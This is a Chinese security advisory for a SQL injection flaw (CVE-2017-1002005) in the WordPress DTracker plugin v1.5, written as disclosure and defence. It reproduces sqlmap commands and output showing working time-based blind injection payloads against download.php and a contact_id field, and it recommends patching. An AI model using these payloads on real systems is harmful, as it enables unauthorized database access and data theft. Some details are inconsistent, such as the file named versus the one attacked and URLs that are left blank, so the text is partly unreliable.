WordPress DTracker SQL注入漏洞(CVE-2017-1002005)
发布日期:2017-03-13
更新日期:2017-03-14
受影响系统:
描述:
BUGTRAQ ID: 96781
CVE(CAN) ID: CVE-2017-1002005
WordPress是一种使用PHP语言开发的博客平台。
Wordpress DTracker v1.5版本在实现上存在SQL注入漏洞,此漏洞位于./dtracker/delete.php文件中。攻击者利用此漏洞可控制应用、访问或修改数据等。
<*来源:Larry W. Cashdollar (lwc@vapid.dhs.org)
链接:
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Larry W. Cashdollar (lwc@vapid.dhs.org)提供了如下测试方法:
• $ sqlmap -u '?id=*' --dbms MySQL
--level 3 --risk 3
• URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
• ---
• Parameter: #1* (URI)
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: :80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN
(7148=7148) THEN SLEEP(5) ELSE 7148 END)
• ---
• [10:14:09] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Ubuntu 16.04 (xenial)
• web application technology: Apache 2.4.18
• back-end DBMS: MySQL >= 5.0.12
• [10:14:09] [WARNING] HTTP error codes detected during run:
• 404 (Not Found) - 14 times
• [10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
• $ sqlmap -u '' --data 'contact_id=*'
--dbms mysql --risk 1 --level 3
•
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
• ---
• Parameter: #1* ((custom) POST)
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
• Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
• ---
• [11:53:27] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Ubuntu 16.04 (xenial)
• web application technology: Apache 2.4.18
• back-end DBMS: MySQL >= 5.0.12
• [11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://wordpress.org/plugins/dtracker/